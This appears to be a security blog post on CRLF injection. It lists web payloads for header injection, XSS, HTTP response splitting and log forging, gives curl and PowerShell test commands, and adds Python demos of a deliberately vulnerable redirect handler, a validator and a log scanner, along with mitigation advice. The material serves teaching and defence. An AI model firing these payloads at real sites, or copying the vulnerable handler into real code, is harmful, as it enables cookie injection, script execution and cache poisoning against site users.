CRLF Injection Payloads


CRLF (Carriage Return Line Feed) injection is a web vulnerability in which attacker-supplied CR (\r, %0D) and LF (\n, %0A) characters reach a place where a line break has meaning: most often an HTTP response header built from user input, or a log line. Depending on where the break lands, the result is header injection, HTTP response splitting, or log forging. Below are the key payloads, how to test for the issue, and how to fix it.

Common CRLF Injection Payloads

1. Basic CRLF Injection

%0D%0ASet-Cookie: malicious=payload

Ends the current header line and starts a new one, so the server's response carries an attacker-chosen Set-Cookie header. This only works where the input is reflected into a response header (typically the Location header of a redirect, or a cookie value), not where it is reflected into the body.

2. XSS via CRLF

%0D%0A%0D%0A<script>alert('XSS')</script>

The double CRLF ends the header block, so everything after it is treated as the response body. The script then runs in the origin of the vulnerable site, which turns a header injection into XSS.

3. HTTP Response Splitting

%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/html%0D%0A%0D%0A<h1>Hacked</h1>

Turns one server response into two: the original (truncated) response and an attacker-written second response. In practice the payload first closes the original response with Content-Length:%200%0D%0A%0D%0A so that a proxy or cache parses the injected HTTP/1.1 200 OK as a complete second message and may store it for the next user (cache poisoning).

4. Log Poisoning

%0D%0AUser-Agent:%20BadBot%0D%0AX-Forwarded-For:%20127.0.0.1

Also called log injection: if the application writes the raw value to a log, the line break splits the entry and the text after it appears as a separate, forged log line. Note that the default access logs of nginx and Apache escape control characters (as \x0D\x0A or \r\n), so this mainly affects application logs that write user input verbatim.

You Should Know: Testing & Mitigation

Testing CRLF with cURL

curl -v "http://example.com/search?q=%0D%0AInjected-Header:test"

Check the raw response headers (curl -v prints them prefixed with <) for a line reading Injected-Header: test. It must appear before the blank line that ends the header block; the same string reflected in the body is not CRLF injection. Also try the payload in values that commonly end up in headers, such as a redirect target or a cookie parameter.
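The following added example (not code from the original post) shows, for the three payloads listed above, what the raw response bytes look like when a value is copied into a header unvalidated, and performs the same check the curl test does by eye: parsing the response and asking whether a header the server never sends has appeared. The vulnerable redirect handler and the proxy-style parser are constructed for illustration; no network connection is made.

```python
"""Added example: what a CRLF in an unvalidated header value does to an HTTP response."""
from urllib.parse import unquote

# The page's payloads as they would appear in a query string. The split payload is
# prefixed with Content-Length: 0 so the first response ends before the second begins.
PAYLOADS = {
    "set-cookie": "%0D%0ASet-Cookie:%20malicious=payload",
    "xss": "%0D%0A%0D%0A<script>alert('XSS')</script>",
    "split": ("%0D%0AContent-Length:%200%0D%0A%0D%0A"
              "HTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/html%0D%0A"
              "Content-Length:%2015%0D%0A%0D%0A<h1>Hacked</h1>"),
}


def build_redirect_vulnerable(next_param: str) -> bytes:
    """Constructed vulnerable redirect handler: the URL-decoded value is written
    straight into the Location header, so %0D%0A becomes a real line break."""
    target = unquote(next_param)
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: /{target}\r\n"
        "Content-Type: text/html\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("utf-8")


def parse_responses(raw: bytes) -> list[dict]:
    """Split a byte stream into HTTP responses the way a simple proxy or client does:
    status line, header lines up to the first blank line, then Content-Length bytes
    of body (or everything that remains when there is no Content-Length)."""
    responses = []
    rest = raw
    while rest.startswith(b"HTTP/"):
        head, _, rest = rest.partition(b"\r\n\r\n")
        status, *header_lines = head.decode("utf-8").split("\r\n")
        headers = []
        for line in header_lines:
            name, _, value = line.partition(":")
            headers.append((name.strip(), value.strip()))
        length = next((v for n, v in headers if n.lower() == "content-length"), None)
        if length is None:
            body, rest = rest, b""  # no length: a client reads until the connection closes
        else:
            n = int(length)
            body, rest = rest[:n], rest[n:]
        responses.append({"status": status, "headers": headers, "body": body.decode("utf-8")})
    return responses


def has_header(responses: list[dict], name: str) -> bool:
    """The curl check, automated: did a header the server never sends appear anywhere?"""
    return any(n.lower() == name.lower() for r in responses for n, _ in r["headers"])


if __name__ == "__main__":
    for label, payload in PAYLOADS.items():
        parsed = parse_responses(build_redirect_vulnerable(payload))
        print(f"{label}: {len(parsed)} response(s), Set-Cookie injected: {has_header(parsed, 'Set-Cookie')}")
        for r in parsed:
            print("  ", r["status"], r["headers"], repr(r["body"][:40]))
```

Running it shows the Set-Cookie payload adding a fourth header to a single response, the XSS payload turning the rest of the stream into a body that starts with the script tag, and the split payload producing two parsed responses, the second with status 200 and the attacker's HTML as its body.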

Automated Scanning with Burp Suite

1. Intercept a request.

2. Insert CRLF payloads in parameters.

3. Forward and observe responses.

Mitigation in Web Applications

  • Input Validation (reject, or at least strip, CR and LF before the value reaches a header):
    import re
    # Stripping keeps the rest of the attacker's text in the header; rejecting the
    # request with a 400 is the safer choice.
    cleaned_input = re.sub(r'[\r\n]', '', user_input)
    
  • Do not rely on output encoding: HTML encoding such as htmlspecialchars() leaves CR and LF untouched, so it does not protect a header. In PHP, header() itself refuses a value that contains a newline; check the value and fail the request instead of encoding it:
    if (preg_match('/[\r\n]/', $value)) { http_response_code(400); exit; }
    header("X-Custom: $value");
    
  • Use frameworks and runtimes that validate header values:
  • Django raises BadHeaderError when a header value contains a newline.
  • Node's http module throws ERR_INVALID_CHAR for a header value with CR or LF (Helmet adds security headers but does not prevent CRLF injection).
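As an added example (not from the original post), the block below contrasts the strip-only approach from the list above with a fail-closed validator that allows only the visible-ASCII field-value characters, and includes a small offline check of what CPython's http.client already refuses. The assumption is that the application never needs non-ASCII or folded (obs-fold) header values, which is true for almost all applications.

```python
"""Added example: validating HTTP header values before they are written."""
import http.client
import re

# RFC 9110 field-value characters restricted to visible ASCII plus SP and HTAB:
# no CR, LF, NUL or other control bytes, and no obs-fold continuation lines.
# Assumption: non-ASCII header values are never needed.
_FIELD_VALUE = re.compile(r"[\t\x20-\x7e]*")


def is_safe_header_value(value: str) -> bool:
    return _FIELD_VALUE.fullmatch(value) is not None


def safe_header_value(value: str) -> str:
    """Return the value unchanged if it is safe to emit, otherwise raise (fail closed)."""
    if not is_safe_header_value(value):
        raise ValueError(f"refusing header value with control characters: {value!r}")
    return value


def stripped_header_value(value: str) -> str:
    """The strip-only approach from the mitigation list, kept for comparison: the
    attacker's text survives, only the line break is gone."""
    return re.sub(r"[\r\n]", "", value)


def stdlib_rejects(value: str) -> bool:
    """Does CPython's http.client refuse this value? putrequest() and putheader()
    only buffer bytes, nothing is sent, so this runs offline."""
    conn = http.client.HTTPConnection("localhost")
    conn.putrequest("GET", "/")
    try:
        conn.putheader("X-Test", value)
        return False
    except ValueError:
        return True
    finally:
        conn.close()


if __name__ == "__main__":
    samples = ["text/html; charset=utf-8", "x\r\nSet-Cookie: a=b", "x\rb", "x\r\n b"]
    for s in samples:
        print(f"{s!r:32} safe={is_safe_header_value(s)!s:5} "
              f"stripped={stripped_header_value(s)!r:28} stdlib_rejects={stdlib_rejects(s)}")
```

Two things worth noticing in the output: stripping "x\r\nSet-Cookie: a=b" yields "xSet-Cookie: a=b", which still ships attacker text in the header; and http.client accepts "x\r\n b" because a CRLF followed by a space or tab is a legacy line fold rather than a new header, so a validator that only looks for bare CR/LF is weaker than the allow-list above.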

Linux Command for Log Analysis

grep -c $'\r' /var/log/nginx/access.log
grep -E -i '%0d%0a|\\x0d\\x0a' /var/log/nginx/access.log

The first command counts lines containing a raw carriage return. grep reads one line at a time, so a pattern containing \n can never match and "\r\n" is not a usable pattern. The second finds URL-encoded CRLF in request lines and the \x0D\x0A escapes nginx writes when a header carried raw control bytes.
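The grep commands above find individual markers; the added example below (not from the original post) does the same over a constructed combined-format access log and adds the check grep cannot do: a physical line that fails to parse as a complete entry is the tell-tale leading half of an entry that an injected CRLF cut in two. The sample lines are made up for this example; nothing is read from disk.

```python
"""Added example: scanning an access log for CRLF injection attempts and forged entries."""
import re

# One entry in nginx/Apache combined log format. A physical line that fails this is
# either corrupt or the leading half of an entry that an injected line break split.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# URL-encoded CR/LF as seen in request lines, the \xHH escapes nginx writes for raw
# control bytes in a header, and the \r \n escapes Apache writes for the same.
CRLF_MARKERS = re.compile(r"%0[da]|\\x0[da]|\\[rn]", re.IGNORECASE)

# Constructed sample log. Entry 4 is what an application that logs the raw User-Agent
# produces: the CRLF ends the entry early and the second half is a well-formed forged
# line for a request that never happened.
SAMPLE_LOG = b"\n".join([
    b'127.0.0.1 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=%0D%0AInjected-Header:test HTTP/1.1" 200 512 "-" "curl/8.0"',
    b'10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    b'10.0.0.7 - - [10/Oct/2023:13:55:41 +0000] "GET / HTTP/1.1" 200 10 "-" "BadBot\\x0D\\x0AX-Forwarded-For: 127.0.0.1"',
    b'10.0.0.9 - - [10/Oct/2023:13:55:42 +0000] "GET / HTTP/1.1" 200 10 "-" "Bot\r\n'
    b'127.0.0.1 - - [10/Oct/2023:13:55:42 +0000] "GET /admin HTTP/1.1" 200 10 "-" "legit"',
]) + b"\n"


def scan_access_log(data: bytes) -> list[dict]:
    """Return one finding per suspicious physical line: a raw CR, a line that is not a
    complete combined-format entry, or an encoded CRLF in a client-controlled field."""
    findings = []
    for lineno, raw in enumerate(data.split(b"\n"), start=1):
        if not raw:
            continue
        line = raw.decode("utf-8", errors="replace")
        reasons = []
        if "\r" in line:
            reasons.append("raw CR in log line")
        entry = COMBINED.match(line.rstrip("\r"))
        if entry is None:
            reasons.append("not a complete combined-format entry (cut by an injected line break?)")
        else:
            for field in ("request", "referer", "ua"):
                if CRLF_MARKERS.search(entry.group(field)):
                    reasons.append(f"encoded CRLF in {field}")
        if reasons:
            findings.append({"line": lineno, "reasons": reasons, "text": line})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']}: {'; '.join(f['reasons'])}")
```

Lines 1, 3 and 4 are reported; line 5, the forged entry, is not, because it is indistinguishable from a real one. That is the point of log forging, and it is why the truncated line before it (line 4) is the signal to correlate on rather than the forged line itself.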

Windows Command for HTTP Server Testing

Invoke-WebRequest -Uri "http://localhost/?param=%0D%0AHacked:true" -Headers @{"User-Agent"="CRLF-Test"}

What Undercode Say

CRLF injection remains a common finding wherever user input is copied into headers or logs without validation. Always:
– Validate user input before it reaches a header or a log line; reject CR and LF rather than trying to encode them.
– Rely on frameworks and runtimes that refuse header values containing line breaks, and do not disable those checks.
– Monitor logs for raw or encoded CRLF sequences and for truncated entries.
– Use tools like Burp Suite, ZAP, or cURL to test redirect targets, cookie values, and any other parameter that is reflected into a header.

Expected Output:

HTTP/1.1 200 OK
Injected-Header: test

Relevant URLs:

  1. Z-Security Courses
  2. CRLF Injection Explained (OWASP)


References:

Reported By: Zlatanh Crlf – Hackers Feeds